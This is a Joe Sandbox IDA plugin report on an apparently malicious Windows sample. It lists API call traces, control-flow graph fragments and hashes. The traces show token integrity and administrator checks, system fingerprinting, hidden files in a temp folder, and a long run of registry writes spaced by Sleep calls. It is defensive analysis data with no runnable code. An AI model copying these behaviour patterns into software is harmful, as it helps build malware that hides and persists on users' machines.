                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$Sleep$CloseCreateValue$lstrcat$lstrcpy$CountTick
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$Shell
                                                                                                                                                                                                                                                      • API String ID: 2961240498-2765105148
                                                                                                                                                                                                                                                      • Opcode ID: 7404fc93447d8bf64e56304fcf3f363a38a5c7cd9712ee1ee70b377c33cd25fb
                                                                                                                                                                                                                                                      • Instruction ID: 90de6ba1451ff6c394c1e8d4d076b74571b15df8ac0f0f587aead68d2d5e9081
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7404fc93447d8bf64e56304fcf3f363a38a5c7cd9712ee1ee70b377c33cd25fb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2123DB2D4021CBFEB21EB90DC8AFEA777DEB44305F1004BAB605A5051EEB45F948E65

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E4B
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E52
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E5C
                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000104,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00413E75
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E81
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E88
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F77
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000006,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F82
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\, xrefs: 00413E3C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$ProcessToken$AttributesCloseCurrentFileHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\
                                                                                                                                                                                                                                                      • API String ID: 3498935171-1812980290
                                                                                                                                                                                                                                                      • Opcode ID: ae00fb54b3492c3a0ace82967610d98ed381333d34f1cc31c124c4b0d0481274
                                                                                                                                                                                                                                                      • Instruction ID: 790f76d0c7c029a87acee6e2e27f50b46b65660552c2eddc99154039eeec75a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae00fb54b3492c3a0ace82967610d98ed381333d34f1cc31c124c4b0d0481274
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC411B71E00218BBDB209FA1ED4DEEE7FBCEB44705F50006AF901E2160DB749A56DB69

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D52
                                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D63
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,776AC310,00000000), ref: 00408D76
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00408D7F
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D89
                                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D91
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetProductInfo,?,?,?,776AC310,00000000), ref: 00408D9D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00408DA0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressHandleInfoModuleProcSystemVersion$Native
                                                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$GetProductInfo$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 3903033433-163341747
                                                                                                                                                                                                                                                      • Opcode ID: fbbee03e285ec05455dee1f19f6cdfb3ba18d411294cec618d8be033263a36fd
                                                                                                                                                                                                                                                      • Instruction ID: d88b8f0607474c3343ca8232b8e6d8559b1ef925911f9e6111a5faab946cfceb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbbee03e285ec05455dee1f19f6cdfb3ba18d411294cec618d8be033263a36fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1219171A0025CDBDB20DFA4DC44E9E7BB8EF48340F54446AF911A7281D738A94ACF69

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 914 40c34f-40c389 GetCurrentProcess OpenProcessToken 915 40c392-40c3bb GetTokenInformation CloseHandle 914->915 916 40c38b-40c38d 914->916 918 40c3c1-40c3e0 AllocateAndInitializeSid 915->918 919 40c3bd-40c3bf 915->919 917 40c42e-40c430 916->917 918->919 921 40c3e2-40c3ed 918->921 920 40c42d 919->920 920->917 922 40c41e-40c42a FreeSid 921->922 923 40c3ef-40c3f0 921->923 922->920 924 40c3f6-40c3f9 923->924 925 40c3fb-40c408 EqualSid 924->925 926 40c41d 924->926 927 40c411-40c41b 925->927 928 40c40a 925->928 926->922 927->924 927->926 928->927
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000), ref: 0040C37A
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040C381
                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000002,?,00000400,?,C:\Users\user\AppData\Local\Temp\), ref: 0040C3A8
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040C3B3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040C392
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                      • API String ID: 215268677-787714339
                                                                                                                                                                                                                                                      • Opcode ID: 3fc46e723eba71a1b8dee2f8b2f347e21d2e4dbc9b647d4307064d127fe98ce9
                                                                                                                                                                                                                                                      • Instruction ID: f3f63443dbc0749890ce36748c36b560e41776e2a16b7f1285e76c09dac5efdf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fc46e723eba71a1b8dee2f8b2f347e21d2e4dbc9b647d4307064d127fe98ce9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B52160B2D00219FBDF119FA49C85AEEBB79BB14301F4081BAEA01B3191DB345A45DF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,0042B7F8,00000060), ref: 00422BB3
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,?,0042B7F8,00000060), ref: 00422C06
                                                                                                                                                                                                                                                      • GetCommandLineA.KERNEL32(?,0042B7F8,00000060), ref: 00422C9F
                                                                                                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00422CF3
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00422D16
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleModule$CommandInfoLineStartupVersion
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2778164164-0
                                                                                                                                                                                                                                                      • Opcode ID: 544791c77213106303abe15329d4be5378e9b9fc1e400ee312837e66c0c246e7
                                                                                                                                                                                                                                                      • Instruction ID: e61f031dfd1e6ee1ba070bf2223e8a7bfb6b0622ed2d9bb9f5bd357ba4bfd0df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 544791c77213106303abe15329d4be5378e9b9fc1e400ee312837e66c0c246e7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2341C670F00631AAD721AF76B90566E77A0AF04715FA0442FE405AB292EBBC9942CB5D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C14
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00413E9A,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C1D
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocateSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3409823521-0
                                                                                                                                                                                                                                                      • Opcode ID: dc8d79010e6cb7fb2a9b52c8fd9bd5d07f5d98b887a2c5e385c4889fd42eb09a
                                                                                                                                                                                                                                                      • Instruction ID: 01a82105be4d9c68f9512b8fa3753ec40f4bf94fe3f1a858fa601996ad67c288
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc8d79010e6cb7fb2a9b52c8fd9bd5d07f5d98b887a2c5e385c4889fd42eb09a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7E0D83274121877C020279BAD45F5BF75CDFD5BA4F414022F704971509AA6686286FA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CursorSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4211308429-0
                                                                                                                                                                                                                                                      • Opcode ID: a18abad0d9134f67dbb407c31c5c62fbab7a71adb5fb281b7f8a0cd74ff0b0b2
                                                                                                                                                                                                                                                      • Instruction ID: ec4e0dc912df284146a4d6c4ec45948b48cf9508f1cb833489b9ad9e6170350e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a18abad0d9134f67dbb407c31c5c62fbab7a71adb5fb281b7f8a0cd74ff0b0b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8E0ED32804218EBDB219B95D8896AE7739F741721F610265D801732818A787E429AF9

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,76AF23A0,-000927C0,00000011), ref: 00406190
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 004061BA
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004), ref: 004061C8
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000001,00000004), ref: 004061CD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004), ref: 004061D5
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 00406201
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040622F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406237
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040623E
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 00406261
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406269
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040628C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406294
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 004062B7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004062BF
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 004062E2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004062EA
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 0040630D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406315
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406338
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406340
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 00406363
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 0040636B
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040638E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406396
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 004063B9
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004063C2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004063CA
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00020006,00000000,?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 004063FD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406405
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 00406428
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406431
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406439
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000004,00000001,00000004), ref: 00406465
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040646D
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000004,00000001), ref: 00406490
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000004,00000001,00000004), ref: 00406499
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000004,00000001,00000004), ref: 004064A1
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 004064D4
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001,00000004), ref: 004064FB
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406504
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040650C
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001), ref: 0040653F
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091,00000004), ref: 00406566
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091,00000004,?,?,00000000), ref: 0040656E
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091), ref: 00406591
